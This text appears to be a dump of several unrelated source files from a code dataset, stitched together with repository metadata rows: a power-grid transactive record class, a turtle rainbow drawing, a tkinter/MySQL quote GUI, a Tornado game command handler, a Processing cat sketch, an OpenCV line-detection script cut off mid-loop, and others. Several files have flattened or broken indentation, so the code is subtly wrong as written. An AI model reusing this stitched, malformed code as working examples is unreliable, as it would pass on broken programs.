This material was prepared as an account of work sponsored by an agency of the
United States Government. Neither the United States Government nor the United
States Department of Energy, nor Battelle, nor any of their employees, nor any
jurisdiction or organization that has cooperated in the development of these
materials, makes any warranty, express or implied, or assumes any legal
liability or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed, or
represents that its use would not infringe privately owned rights.
Reference herein to any specific commercial product, process, or service by
trade name, trademark, manufacturer, or otherwise does not necessarily
constitute or imply its endorsement, recommendation, or favoring by the
United States Government or any agency thereof, or Battelle Memorial Institute.
The views and opinions of authors expressed herein do not necessarily state or
reflect those of the United States Government or any agency thereof.
PACIFIC NORTHWEST NATIONAL LABORATORY
operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
under Contract DE-AC05-76RL01830
"""
from datetime import datetime
from .time_interval import TimeInterval
from .helpers import format_ts
class TransactiveRecord:
def __init__(self, ti, rn, mp, p, pu=0.0, cost=0.0, rp=0.0, rpu=0.0, v=0.0, vu=0.0):
# NOTE: As of Feb 2018, ti is forced to be text, the time interval name,
# not a TimeInterval object.
# ti - TimeInterval object (that must be converted to its name)
# rn - record number, a nonzero integer
# mp - marginal price [$/kWh]
# p - power [avg.kW]
# These are the four normal arguments of the constructor.
# NOTE: Use the time interval ti text name, not a TimeInterval object itself.
if isinstance(ti, TimeInterval):
# A TimeInterval object argument must be represented by its text name.
self.timeInterval = ti.name
else:
# Argument ti is most likely received as a text string name. Further
# validation might be used to make sure that ti is a valid name of an
# active time interval.
self.timeInterval = ti
self.record = rn # a record number (0 refers to the balance point)
self.marginalPrice = mp # marginal price [$/kWh]
self.power = p # power [avg.kW]
# Source and target are obvious from Neighbor and filenames. Omit
# self.powerUncertainty = pu # relative [dimensionless]
self.cost = cost # ?
# self.reactivePower = rp # [avg.kVAR]
# self.reactivePowerUncertainty = rpu # relative [dimensionless]
# self.voltage = v # [p.u.]
# self.voltageUncertainty = vu # relative [dimensionless]
# Finally, create the timestamp that captures when the record is created.
self.timeStamp = datetime.utcnow()
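# Illustrative usage (not part of the original module): a minimal sketch of creating a
# record for one active time interval. The interval name, record number, price and power
# values below are made-up placeholders, not values from any real market cycle.
def _example_record():
    record = TransactiveRecord(
        ti='200207T120000',  # time interval referenced by its text name, as the constructor notes
        rn=1,                # nonzero record number (0 is reserved for the balance point)
        mp=0.045,            # marginal price [$/kWh]
        p=12.5,              # power [avg. kW]
    )
    return record.timeInterval, record.marginalPrice, record.power, record.timeStamp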
|
[
"shwetha.niddodi@pnnl.gov"
] |
shwetha.niddodi@pnnl.gov
|
4d1858de9f200007868855912c5cb09bbd0ff480
|
b99255c89683d4123a560a1eb6221b21013d917d
|
/path_manager/page/category_page.py
|
f51ce67d375f686b79ed3751f06300e58f94fc61
|
[
"MIT"
] |
permissive
|
sweetcolor/internet_market_scraper
|
f7a89e8c54124aadfecaa89f1c84d6c73762ff8b
|
f7eb8c9ade2c0a956ba5d5b7e6173010c85afed6
|
refs/heads/master
| 2021-09-04T04:05:46.529150
| 2018-01-15T17:02:59
| 2018-01-15T17:02:59
| 115,523,578
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 156
|
py
|
from path_manager.page.page import Page
class CategoryPage(Page):
def __init__(self, link, parent_page):
super().__init__(link, parent_page)
|
[
"sweet3color@gmail.com"
] |
sweet3color@gmail.com
|
8dffd82bcaecce6cabc8c75ad494f05fdb50eb2c
|
463b1807820b9fa119e0c17afaa06840fef0e2a3
|
/TURTLE/Rainbow.py
|
c1cd2fce89f6b3134ecc681a44f9b1183f16a2cc
|
[] |
no_license
|
ferdi-oktavian/Python
|
ad8aac711d5565739077a6e5358777807dd464d3
|
27ad83aeedb3e460927bfcf179bc4e4b1ed28366
|
refs/heads/main
| 2023-03-09T02:49:54.481087
| 2021-03-02T00:12:54
| 2021-03-02T00:12:54
| 343,593,542
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
import turtle
import colorsys
def draw_one_color_arc(x, y, r, pensize, color):
    turtle.up()
    turtle.goto(x + r, y)
    turtle.down()
    turtle.seth(90)
    turtle.pensize(pensize)
    turtle.pencolor(color)
turtle.circle(r,180)
turtle.speed(0)
turtle.hideturtle()
turtle.bgcolor('light blue')
turtle.title('rainbow')
turtle.setup(700, 700)
num_colors = 49
radius = 400
penwidth = 20 * 7 / num_colors
hue = 0
for i in range(num_colors):
(r, g, b) = colorsys.hsv_to_rgb(hue,1,1)
draw_one_color_arc(0, -100,radius,penwidth,(r,g,b))
radius -= (penwidth-1)
hue += 0.9/num_colors
turtle.getscreen()._root.mainloop()
|
[
"noreply@github.com"
] |
ferdi-oktavian.noreply@github.com
|
d9f0bd32c021cff6d85d2b4c86f7c6a119a3be14
|
0912be54934d2ac5022c85151479a1460afcd570
|
/Ch07_Code/GUI_MySQL.py
|
cf54d12400d1045cffa7dcdeaa05f864343ff849
|
[
"MIT"
] |
permissive
|
actuarial-tools/Python-GUI-Programming-Cookbook-Third-Edition
|
6d9d155663dda4450d0b180f43bab46c24d18d09
|
8c9fc4b3bff8eeeda7f18381faf33c19e98a14fe
|
refs/heads/master
| 2023-01-31T13:11:34.315477
| 2020-12-15T08:21:06
| 2020-12-15T08:21:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,876
|
py
|
'''
Created on May 29, 2019
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import Menu
from tkinter import Spinbox
from Ch07_Code.ToolTip import ToolTip
from threading import Thread
from time import sleep
from queue import Queue
from tkinter import filedialog as fd
from os import path, makedirs
from tkinter import messagebox as mBox
from Ch07_Code.GUI_MySQL_class import MySQL
# Module level GLOBALS
GLOBAL_CONST = 42
fDir = path.dirname(__file__)
netDir = fDir + '\\Backup'
if not path.exists(netDir):
makedirs(netDir, exist_ok = True)
WIDGET_LABEL = ' Widgets Frame '
#===================================================================
class OOP():
def __init__(self):
# Create instance
self.win = tk.Tk()
# Add a title
self.win.title("Python GUI")
# Disable resizing the window
self.win.resizable(0,0)
# Create a Queue
self.guiQueue = Queue()
self.createWidgets()
# populate Tab 2 Entries
self.defaultFileEntries()
# create MySQL instance
self.mySQL = MySQL()
def defaultFileEntries(self):
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, 'Z:\\') # bogus path
self.fileEntry.config(state='readonly')
self.netwEntry.delete(0, tk.END)
self.netwEntry.insert(0, 'Z:\\Backup') # bogus path
# Combobox callback
def _combo(self, val=0):
value = self.combo.get()
self.scr.insert(tk.INSERT, value + '\n')
# Spinbox callback
def _spin(self):
value = self.spin.get()
self.scr.insert(tk.INSERT, value + '\n')
# Checkbox callback
def checkCallback(self, *ignoredArgs):
# only enable one checkbutton
if self.chVarUn.get(): self.check3.configure(state='disabled')
else: self.check3.configure(state='normal')
if self.chVarEn.get(): self.check2.configure(state='disabled')
else: self.check2.configure(state='normal')
# Radiobutton callback function
def radCall(self):
radSel=self.radVar.get()
if radSel == 0: self.mySQL2.configure(text=WIDGET_LABEL + 'in Blue')
elif radSel == 1: self.mySQL2.configure(text=WIDGET_LABEL + 'in Gold')
elif radSel == 2: self.mySQL2.configure(text=WIDGET_LABEL + 'in Red')
# Exit GUI cleanly
def _quit(self):
self.win.quit()
self.win.destroy()
exit()
def methodInAThread(self, numOfLoops=10):
for idx in range(numOfLoops):
sleep(1)
self.scr.insert(tk.INSERT, str(idx) + '\n')
sleep(1)
        print('methodInAThread():', self.runT.is_alive())
# Running methods in Threads
def createThread(self, num):
self.runT = Thread(target=self.methodInAThread, args=[num])
self.runT.setDaemon(True)
self.runT.start()
print(self.runT)
        print('createThread():', self.runT.is_alive())
# textBoxes are the Consumers of Queue data
writeT = Thread(target=self.useQueues, daemon=True)
writeT.start()
# Create Queue instance
def useQueues(self):
# Now using a class member Queue
while True:
qItem = self.guiQueue.get()
print(qItem)
self.scr.insert(tk.INSERT, qItem + '\n')
# Button callback
def insertQuote(self):
title = self.bookTitle.get()
page = self.pageNumber.get()
quote = self.quote.get(1.0, tk.END)
print(title)
print(quote)
self.mySQL.insertBooks(title, page, quote)
# Button callback
def getQuote(self):
allBooks = self.mySQL.showBooks()
print(allBooks)
self.quote.insert(tk.INSERT, allBooks)
# Button callback
def modifyQuote(self):
raise NotImplementedError("This still needs to be implemented for the SQL command.")
#####################################################################################
def createWidgets(self):
# Tab Control introduced here --------------------------------------
tabControl = ttk.Notebook(self.win) # Create Tab Control
tab1 = ttk.Frame(tabControl) # Create a tab
tabControl.add(tab1, text='MySQL') # Add the tab
tab2 = ttk.Frame(tabControl) # Add a second tab
tabControl.add(tab2, text='Widgets') # Make second tab visible
tabControl.pack(expand=1, fill="both") # Pack to make visible
# ~ Tab Control introduced here -----------------------------------------
# We are creating a container frame to hold all other widgets
self.mySQL = ttk.LabelFrame(tab1, text=' Python Database ')
self.mySQL.grid(column=0, row=0, padx=8, pady=4)
# Creating a Label
ttk.Label(self.mySQL, text="Book Title:").grid(column=0, row=0, sticky='W')
# Adding a Textbox Entry widget
book = tk.StringVar()
self.bookTitle = ttk.Entry(self.mySQL, width=34, textvariable=book)
self.bookTitle.grid(column=0, row=1, sticky='W')
# Adding a Textbox Entry widget
book1 = tk.StringVar()
self.bookTitle1 = ttk.Entry(self.mySQL, width=34, textvariable=book1)
self.bookTitle1.grid(column=0, row=2, sticky='W')
# Adding a Textbox Entry widget
book2 = tk.StringVar()
self.bookTitle2 = ttk.Entry(self.mySQL, width=34, textvariable=book2)
self.bookTitle2.grid(column=0, row=3, sticky='W')
# Creating a Label
ttk.Label(self.mySQL, text="Page:").grid(column=1, row=0, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber.grid(column=1, row=1, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber1 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber1.grid(column=1, row=2, sticky='W')
# Adding a Textbox Entry widget
page = tk.StringVar()
self.pageNumber2 = ttk.Entry(self.mySQL, width=6, textvariable=page)
self.pageNumber2.grid(column=1, row=3, sticky='W')
# Adding a Button
self.action = ttk.Button(self.mySQL, text="Insert Quote", command=self.insertQuote)
self.action.grid(column=2, row=1)
# Adding a Button
self.action1 = ttk.Button(self.mySQL, text="Get Quotes", command=self.getQuote)
self.action1.grid(column=2, row=2)
# Adding a Button
        self.action2 = ttk.Button(self.mySQL, text="Modify Quote", command=self.modifyQuote)
self.action2.grid(column=2, row=3)
# Add some space around each widget
for child in self.mySQL.winfo_children():
child.grid_configure(padx=2, pady=4)
quoteFrame = ttk.LabelFrame(tab1, text=' Book Quotation ')
quoteFrame.grid(column=0, row=1, padx=8, pady=4)
# Using a scrolled Text control
quoteW = 40; quoteH = 6
self.quote = scrolledtext.ScrolledText(quoteFrame, width=quoteW, height=quoteH, wrap=tk.WORD)
self.quote.grid(column=0, row=8, sticky='WE', columnspan=3)
# Add some space around each widget
for child in quoteFrame.winfo_children():
child.grid_configure(padx=2, pady=4)
#======================================================================================================
# Tab Control 2
#======================================================================================================
# We are creating a container frame to hold all other widgets -- Tab2
self.mySQL2 = ttk.LabelFrame(tab2, text=WIDGET_LABEL)
self.mySQL2.grid(column=0, row=0, padx=8, pady=4)
# Creating three checkbuttons
self.chVarDis = tk.IntVar()
self.check1 = tk.Checkbutton(self.mySQL2, text="Disabled", variable=self.chVarDis, state='disabled')
self.check1.select()
self.check1.grid(column=0, row=0, sticky=tk.W)
self.chVarUn = tk.IntVar()
self.check2 = tk.Checkbutton(self.mySQL2, text="UnChecked", variable=self.chVarUn)
self.check2.deselect()
self.check2.grid(column=1, row=0, sticky=tk.W )
self.chVarEn = tk.IntVar()
self.check3 = tk.Checkbutton(self.mySQL2, text="Toggle", variable=self.chVarEn)
self.check3.deselect()
self.check3.grid(column=2, row=0, sticky=tk.W)
# trace the state of the two checkbuttons
self.chVarUn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
self.chVarEn.trace('w', lambda unused0, unused1, unused2 : self.checkCallback())
# Radiobutton list
colors = ["Blue", "Gold", "Red"]
self.radVar = tk.IntVar()
# Selecting a non-existing index value for radVar
self.radVar.set(99)
# Creating all three Radiobutton widgets within one loop
for col in range(3):
curRad = 'rad' + str(col)
curRad = tk.Radiobutton(self.mySQL2, text=colors[col], variable=self.radVar, value=col, command=self.radCall)
curRad.grid(column=col, row=6, sticky=tk.W, columnspan=3)
# And now adding tooltips
ToolTip(curRad, 'This is a Radiobutton control.')
# Create a container to hold labels
labelsFrame = ttk.LabelFrame(self.mySQL2, text=' Labels within a Frame ')
labelsFrame.grid(column=0, row=7, pady=6)
# Place labels into the container element - vertically
ttk.Label(labelsFrame, text="Choose a number:").grid(column=0, row=0)
ttk.Label(labelsFrame, text="Label 2").grid(column=0, row=1)
# Add some space around each label
for child in labelsFrame.winfo_children():
child.grid_configure(padx=6, pady=1)
number = tk.StringVar()
self.combo = ttk.Combobox(self.mySQL2, width=12, textvariable=number)
self.combo['values'] = (1, 2, 4, 42, 100)
self.combo.grid(column=1, row=7, sticky=tk.W)
self.combo.current(0)
self.combo.bind('<<ComboboxSelected>>', self._combo)
# Adding a Spinbox widget using a set of values
self.spin = Spinbox(self.mySQL2, values=(1, 2, 4, 42, 100), width=5, bd=8, command=self._spin)
        self.spin.grid(column=2, row=7, sticky='W', padx=6, pady=1)
# Using a scrolled Text control
scrolW = 40; scrolH = 1
self.scr = scrolledtext.ScrolledText(self.mySQL2, width=scrolW, height=scrolH, wrap=tk.WORD)
self.scr.grid(column=0, row=8, sticky='WE', columnspan=3)
# Create Manage Files Frame ------------------------------------------------
mngFilesFrame = ttk.LabelFrame(tab2, text=' Manage Files: ')
mngFilesFrame.grid(column=0, row=1, sticky='WE', padx=10, pady=5)
# Button Callback
def getFileName():
print('hello from getFileName')
fDir = path.dirname(__file__)
fName = fd.askopenfilename(parent=self.win, initialdir=fDir)
print(fName)
self.fileEntry.config(state='enabled')
self.fileEntry.delete(0, tk.END)
self.fileEntry.insert(0, fName)
if len(fName) > self.entryLen:
self.fileEntry.config(width=len(fName) + 3)
# Add Widgets to Manage Files Frame
lb = ttk.Button(mngFilesFrame, text="Browse to File...", command=getFileName)
lb.grid(column=0, row=0, sticky=tk.W)
#-----------------------------------------------------
file = tk.StringVar()
self.entryLen = scrolW - 4
self.fileEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=file)
self.fileEntry.grid(column=1, row=0, sticky=tk.W)
#-----------------------------------------------------
logDir = tk.StringVar()
self.netwEntry = ttk.Entry(mngFilesFrame, width=self.entryLen, textvariable=logDir)
self.netwEntry.grid(column=1, row=1, sticky=tk.W)
def copyFile():
import shutil
src = self.fileEntry.get()
file = src.split('/')[-1]
dst = self.netwEntry.get() + '\\'+ file
try:
shutil.copy(src, dst)
                mBox.showinfo('Copy File to Network', 'Success: File copied.')
except FileNotFoundError as err:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(err))
except Exception as ex:
mBox.showerror('Copy File to Network', '*** Failed to copy file! ***\n\n' + str(ex))
cb = ttk.Button(mngFilesFrame, text="Copy File To : ", command=copyFile)
cb.grid(column=0, row=1, sticky=tk.E)
# Add some space around each label
for child in mngFilesFrame.winfo_children():
child.grid_configure(padx=6, pady=6)
# Creating a Menu Bar ==========================================================
menuBar = Menu(tab1)
self.win.config(menu=menuBar)
# Add menu items
fileMenu = Menu(menuBar, tearoff=0)
fileMenu.add_command(label="New")
fileMenu.add_separator()
fileMenu.add_command(label="Exit", command=self._quit)
menuBar.add_cascade(label="File", menu=fileMenu)
# Add another Menu to the Menu Bar and an item
helpMenu = Menu(menuBar, tearoff=0)
helpMenu.add_command(label="About")
menuBar.add_cascade(label="Help", menu=helpMenu)
# Change the main windows icon
self.win.iconbitmap('pyc.ico')
# Using tkinter Variable Classes
strData = tk.StringVar()
strData.set('Hello StringVar')
# It is not necessary to create a tk.StringVar()
strData = tk.StringVar()
strData = self.spin.get()
# Place cursor into name Entry
self.bookTitle.focus()
# Add a Tooltip to the Spinbox
ToolTip(self.spin, 'This is a Spin control.')
# Add Tooltips to more widgets
ToolTip(self.bookTitle, 'This is an Entry control.')
ToolTip(self.action, 'This is a Button control.')
ToolTip(self.scr, 'This is a ScrolledText control.')
#======================
# Start GUI
#======================
oop = OOP()
oop.win.mainloop()
|
[
"noreply@github.com"
] |
actuarial-tools.noreply@github.com
|
dcad9b56560d0941b2a0e5ed5d3b3e2336da3c37
|
0785df5c1d893a23a77b73617c1b5c10e6ac238f
|
/local.py
|
7dd3a4cb48cf307e906381640d9a3d04ea3eccd3
|
[] |
no_license
|
AnufrievaAnastasia/Project3
|
dd9482b2c1cb1722c4a1bcfd69f8c3f8210b7fbf
|
237bf9f9c04704a2e8a22ac4088d4ad805f8eeac
|
refs/heads/master
| 2020-08-23T05:03:21.903122
| 2019-10-21T11:21:05
| 2019-10-21T11:21:05
| 216,549,336
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
TXT_TASK = 'The "Truth or Lie" game; you only have two attempts to get through it'
TXT_ANS_1 = 'The hardest natural material on Earth is titanium '
TXT_ANS_2 = 'On average, a person spends about 10 years asleep '
TXT_ANS_3 = 'Dragonflies are the fastest-flying insects '
TXT_ANS_4 = 'The film "Titanic" cost more than the construction of the ship itself did in its day, adjusted for inflation '
TXT_ANS_5 = 'In Norway, a penguin was knighted '
TXT_ANS_6 = 'Ants sleep in the morning '
TXT_ANS_7 = 'Carambola is a sea fish '
TXT_ANS_8 = 'An ignoramus is an ill-mannered and rude person '
TXT_ANS_9 = 'In New Zealand, sign language has the status of an official language '
TXT_ANS_10 = 'Dell is an American corporation that manufactures computers '
TXT_TRUE = 'truth'
TXT_FALSE = 'lie'
TXT_END = 'The game is OVER!'
TXT_WIN = 'You WIN!'
|
[
"anufrieva_01@mail.ru"
] |
anufrieva_01@mail.ru
|
86404a656d1321585c146107b8e2b33929d19370
|
809f119d53610261d71c5e9b5f620c41524868b1
|
/main.py
|
eb0ecb4bd43e420c3f19ab15dbdcc22cd75d1cd5
|
[] |
no_license
|
HackerulGogu/SnakeImpact
|
d07c9866ec8b4320c393b24fbd47793e0c03a140
|
c6c65f9e1de5cc446a56340ac0462cc4ed362b75
|
refs/heads/master
| 2021-04-11T04:19:15.420141
| 2020-03-21T14:51:55
| 2020-03-21T14:51:55
| 248,991,501
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15
|
py
|
print('merge')
|
[
"novaialex44@gmail.com"
] |
novaialex44@gmail.com
|
3c7e5c0670bdcf86f8a00bc3574132e66221f1ea
|
579f04eda7851cd89e04cd39ecf48a0d09f63244
|
/mandala/sketch_cat.pyde
|
4655f0ece0ab99fab7be7870be78a7ab91572cb4
|
[] |
no_license
|
jralipe/ccs221
|
0f378492a380b292e35ff7ec27b4e37cb1992726
|
c70f7834c707c089d2ce01a54b9eda70f50c418f
|
refs/heads/master
| 2020-12-28T18:22:15.919736
| 2020-05-29T00:48:53
| 2020-05-29T00:48:53
| 238,438,446
| 3
| 27
| null | 2020-03-05T11:31:06
| 2020-02-05T11:52:29
|
Python
|
UTF-8
|
Python
| false
| false
| 3,287
|
pyde
|
#Nyancat by Maria Arlyn Fuerte
#BSCS1A
catx = 0
caty = 0
flag = True
def setup():
size(900, 600)
background(25, 25, 112)
def draw():
global catx
global caty
global flag
noStroke()
background(25, 25, 112)
fill(255, 0, 0) #RED
rect(0, caty +150, 200, 20)
fill(255, 165, 0) #ORANGE
rect(0, caty +170, 200, 20)
fill(255, 255, 0) #YELLOW
rect(0, caty + 190, 200, 20)
fill(0, 128, 0) #GREEN
rect(0, caty +210, 200, 20)
fill(0, 0, 255) #BLUE
rect(0, caty +230, 200, 20)
fill(75, 0, 130) #Violet
rect(0, caty +250, 200, 20)
if caty > 280:
flag = False
if caty > 200:
catx +=1
if catx > 250:
caty -=1
if caty < 50:
catx -=1
if catx < 30:
caty +=1
#Pikabody
fill(160)
rect(200, caty +135, 180, 150)
fill(100)
rect(215, caty +150, 150, 120)
fill(160)
rect(215, caty +150, 10, 10)
rect(355, caty +150, 10, 10)
rect(215, caty +260, 10, 10)
#BELT
fill(255)
rect (240, caty+ 130, 30, 170)
#Shadow
fill(0)
rect(190, caty +145, 10, 150) #left
rect(380, caty +145, 10, 150) #right
rect(200, caty +285, 180, 10) #bottom
rect(210, caty +130, 160, 10) #top
rect(200, caty +135, 10, 10) #left
rect(370, caty +135, 10, 10) #right
rect(190, caty +280, 20, 10)
rect(180, caty +290, 10, 20)# backfeet left
rect(180, caty +310, 30, 10)#backfeet bottom
rect(210, caty +290, 10, 20) #backfeet right
rect(230, caty +290, 10, 20)
rect(240, caty +310, 20, 10)
rect(260, caty +290, 10, 30)
#backfeet
fill(160)
rect(190, caty +290, 20, 20)
rect(240, caty +290, 20, 20)
#head
fill(0)
rect(295, caty +220, 140, 40)
rect(305, caty +210, 120, 15)
rect(315, caty +205, 35, 8)
rect(380, caty +205, 35, 8)
rect(315, caty +197, 25, 8)
rect(390, caty +197, 25, 8)
rect(323, caty +189, 10, 8)
rect(398, caty +189, 10, 8)
rect(305, caty +255, 120, 15)
rect(315, caty +270, 100, 20)
rect(320, caty +290, 15, 10)
rect(330, caty +300, 20, 10)
rect(370, caty +290, 15, 10)
rect(380, caty +300, 20, 10)
fill(128)
rect(330, caty +290, 20, 10)
rect(380, caty +290, 20, 10)
rect(315, caty +225, 110, 30)
#eyes
fill(20, 20, 20)
rect(340, caty +230,20, 20)
rect(380, caty +230, 20, 20)
fill(235, 235, 235)
rect(350, caty +240, 10, 10)
rect(390, caty +240, 10, 10)
#cheeks
fill(250, 182, 193)
circle(322, caty +248, 15)
circle(418, caty +248, 15)
#SWORD
fill(50)
rect(400, caty +290, 30, 20)
rect(430, caty +280, 30, 40)
fill(255)
rect(460, caty +290, 90, 20)#BLADE
#shadow
fill(0)
rect(390, caty +300, 10, 20)
rect(400, caty+ 310, 40, 10)
rect(430, caty +320, 40, 10)
rect(460, caty +310, 90, 10)
rect(550, caty +290, 10, 30)
rect(460, caty +280, 90, 10)
rect(420, caty +270, 50, 10)
rect(410, caty +280, 20, 10)
rect(540, caty +290, 10, 10)
|
[
"noreply@github.com"
] |
jralipe.noreply@github.com
|
fc6660d4b5263329f3ba30e3115d2c3f11ba7cdc
|
36a5fb4183534c1f7e2523a80c510c4d59746fe9
|
/sgs/cmd_handlers.py
|
7bc5a5e76f1656a7f16962450eba8dd8fac19ae0
|
[] |
no_license
|
morningbzy/SGS
|
85856ce313a404430fab7fffc5dfc5f9603feaab
|
23db709af3e56d6082c8283ea2fd6f0caf10e85e
|
refs/heads/master
| 2021-01-15T13:18:19.315256
| 2013-08-07T15:38:39
| 2013-08-07T15:38:39
| 10,073,280
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,143
|
py
|
# -*- coding: UTF-8 -*-
import logging
import tornado.escape
import tornado.auth
import tornado.web
from sgs.user import global_users
from sgs.game import global_game
from sgs.cmd import Cmd
class BaseHandler(tornado.web.RequestHandler):
def get_current_user(self):
user_json = self.get_secure_cookie("user")
if not user_json:
return None
return tornado.escape.json_decode(user_json)
class AuthLoginHandler(BaseHandler):
def get(self):
self.render("login.html")
def post(self):
name = self.get_argument("name")
user_dict = {'pk': name, 'name': name}
if global_users.has_user(name):
# TODO: restore the user's state
self.redirect("/auth/login")
else:
global_users.add_user(**user_dict)
self.set_secure_cookie("user", tornado.escape.json_encode(user_dict))
self.redirect("/")
#class AuthLoginHandler(BaseHandler, tornado.auth.GoogleMixin):
# @tornado.web.asynchronous
# @gen.coroutine
# def get(self):
# if self.get_argument("openid.mode", None):
# user = yield self.get_authenticated_user()
# user_dict = tornado.escape.json_encode(user)
# self.set_secure_cookie("sgs_user", user_dict)
# self.redirect("/")
# return
# self.authenticate_redirect(ax_attrs=["name"])
class AuthLogoutHandler(BaseHandler):
def get(self):
self.clear_cookie("user")
self.write("You are now logged out")
class IndexHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
if not self.current_user\
or not global_users.has_user(self.current_user['pk']):
self.redirect('/auth/login')
else:
self.render("game.html")
class SgsCmdRequestHandler(BaseHandler):
@tornado.web.authenticated
def post(self):
cmd_args = self.request.arguments
cmd_args.pop('_xsrf', None)
cmd = cmd_args.pop('cmd')[0]
cmd_args = dict([(k, v[0]) if len(v) == 1 else v
for k, v in cmd_args.iteritems()])
user = global_users.get_user(self.current_user['pk'])
if user.seat_id is not None and 'seat_id' not in cmd_args:
cmd_args['seat_id'] = user.seat_id
cmd = Cmd(cmd, sender=user.pk, **cmd_args)
logging.info('<-- [%s] %s' % (cmd, cmd_args))
self.write(dict(cmds=[cmd.get_ack_cmd().to_simple_dict()]))
global_game.handle_cmd(cmd)
#global_users.broadcast_cmd(cmd)
@tornado.web.authenticated
@tornado.web.asynchronous
def get(self):
user_dict = self.get_current_user()
user = global_users.get_user(user_dict['pk'])
if user:
user.get_cmds(self.on_new_cmd)
else:
self.write(dict(cmds=[]))
def on_new_cmd(self, cmds):
# Closed client connection
if self.request.connection.stream.closed():
user = global_users.get_user(self.get_current_user()['pk'])
user.resend_cmd(cmds)
return
self.finish(dict(cmds=[cmds.to_simple_dict()]))
|
[
"morningbzy@gmail.com"
] |
morningbzy@gmail.com
|
6e295f76fbefde92e0f7d98a4c2ea8a9eb480c01
|
71e6546941d2763946b69800dfb15679fab70d14
|
/image_process.py
|
7b0734e9d6eda4d01c3dc08c071991c44d18d957
|
[] |
no_license
|
ruitengchang/private
|
510d58d1ca5ad5cc7ec7147f0ae00249f38da0a4
|
f9ac73cd1f21d4f1febc0abca627bb1fce2fe3a5
|
refs/heads/master
| 2020-06-05T17:12:34.768517
| 2019-06-18T09:52:55
| 2019-06-18T09:52:55
| 192,493,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,368
|
py
|
import cv2 as cv
import numpy as np
import os
def line_image(image):
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
#cv.imshow("gray",gray)
edges = cv.Canny(gray, 100, 500, apertureSize=3)
#cv.imshow("canny",edges)
# contours,hierarchy=cv.findContours(edges,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)
# point_size=1
# point_color=(0,0,255)
# thickness=4
# print("contours",np.array(contours).shape)
# for i in range(np.array(contours).shape[0]):
# cv.circle(image,(contours[i][0][0][0],contours[i][0][0][1]),point_size,point_color,thickness)
# cv.imshow("result",image)
#cv.imshow("lunkuo",contours)
#r,g,b=cv.split(image)
# cv.connectedComponents(r)
# cv.imshow("conn",cv.merge([r,r,r]))
#print("dian:",hierarchy)
#print("dian shape:",hierarchy.shape)
lines = cv.HoughLines(edges, 1, np.pi / 2, 190)
#print("lines:",lines.shape)
#print(lines)
col=[]
row=[]
#print(col)
#print("----")
for line in lines:
rho, theta = line[0]
if(theta<1):
col.append(rho)
else:
row.append(rho)
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
x1 = int(x0 + 2000 * (-b))
y1 = int(y0 + 2000 * (a))
x2 = int(x0 - 2000 * (-b))
y2 = int(y0 - 2000 * (a))
cv.line(image, (x1, y1), (x2, y2), (0, 0, 255), 2)
#cv.imshow("hough", image)
return col,row
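# line_image() returns the rho offsets of the detected near-vertical lines (col)
# and near-horizontal lines (row); img_process() below sorts them and uses them
# as candidate cell boundaries that judge() tests for filled regions.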
def judge(image,p1,p2,p3,p4):
count=0.0
r,g,b=cv.split(image)
#print(r.shape)#(1080,550)
total=float((abs(p4[0]-p1[0]))*(abs(p4[1]-p1[1])))
for i in range(int(abs(p4[0]-p1[0]))):
for j in range(int(abs(p4[1]-p1[1]))):
x=int(i+p1[0])
y=int(j+p1[1])
if(x>=r.shape[1]):
x=r.shape[1]-1
if(y>=r.shape[0]):
y=r.shape[0]-1
if(r[y][x]!=255):
count=count+1
if(count/total>0.8):
#print("find one")
return 1
else:return 0
def mkdir(path):
# import the module
import os
# strip leading and trailing whitespace
path = path.strip()
# strip a trailing backslash
path = path.rstrip("\\")
# check whether the path exists:
# True if it exists
# False if it does not
isExists = os.path.exists(path)
# act on the result
if not isExists:
# the directory does not exist yet, so create it
os.makedirs(path)
print(path + ' created successfully')
return True
else:
# the directory already exists, so do not create it and just report that
print(path + ' already exists')
return False
def img_process(input):
src = cv.imread(input)
_x=src.shape[1]
_y=src.shape[0]
b,g,r=cv.split(src)
for i in range(b.shape[0]):
for j in range(b.shape[1]):
if(b[i][j]!=255):
b[i][j]=0
src_merged=cv.merge([b,b,b])  # src: original image, src_merged: binarized image; run line detection on both and combine the two results
#cv.imshow("merged",src_merged)
#line_image(src)  # line detection on the original image
col,row=line_image(src_merged)  # line detection on the binarized image
col.sort()
row.sort()
if(col[0]>0):
col.append(0)
col.sort()
if(col[len(col)-1]<_x):
col.append(_x)
if(row[0]>0):
row.append(0)
row.sort()
if(row[len(row)-1]<_y):
row.append(_y)
#print(row)
#print(col)
result=[]
for i in range(len(col)-2):
for j in range(len(row)-2):
p1=[col[i],row[j]]
p2=[col[i+1],row[j]]
p3=[col[i],row[j+1]]
p4=[col[i+1],row[j+1]]
if(judge(src_merged,p1,p2,p3,p4)==1):
result.append([p1,p2,p3,p4])
#print("result",np.array(result).shape)
#print(result)
# for i in range(len(result)):
# print(tuple(result[i]))
# cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2)
# cv.imshow("rec",src_merged)
while(1):  # merge adjacent regions whenever they can be combined
do_sth=0
for i in range(len(result)):
for j in range(len(result)-i-1):
